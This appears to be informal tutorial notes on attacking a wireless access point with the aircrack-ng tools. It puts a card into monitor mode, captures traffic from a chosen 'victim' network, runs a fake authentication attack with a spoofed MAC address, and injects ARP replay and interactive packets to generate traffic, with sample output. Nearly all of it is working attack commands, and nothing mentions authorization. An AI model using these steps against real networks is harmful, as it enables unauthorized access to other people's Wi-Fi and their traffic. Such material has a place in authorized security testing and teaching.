# airmon-ng start ath0
# airodump-ng -w tmp ath0
ctrl+c, search your “victim”.. copy the bssid of the victim and read the channel, for example we use channel 1:
# airodump-ng -w Neo -c 1 ath0
switch to another shell..
GENERATE TRAFFIC#1 – no host traffic
Fake Authentication Attack
This attack won’t generate any more traffic but it does create an associative client MAC Address useful for the above two attacks. Its definately not as good as having a real, connected client, but you gots to do what you gots to do.
This is done easiest with another machine because we need a new MAC address but if you can manually change your MAC then that’ll work too. We’ll call your new MAC address “Fake MAC”.
Now most APs need clients to reassociate every 30 seconds or so or they think they’re disconnected. This is pretty arbitrary but I use it and it has worked but if your Fake MAC gets disconnected, reassociate quicker. We need both the essid and bssid and our Fake MAC.
./aireplay -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0
If successful, you should see something like this:
23:47:29 Sending Authentication Request
23:47:29 Authentication successful
23:47:30 Sending Association Request
23:47:30 Association successful :-)
aireplay-ng --fakeauth 30 -e ...
GENERATE TRAFFIC#2 – host traffic
# aireplay-ng --arpreplay -b MAC_OF_AP -h CLIENT ath0
# aireplay-ng --interactive -a AP_BSSID -h STATION_MAC ath0
Reject any packets with Dest. MAC = FF:FF:FF:FF:FF:FF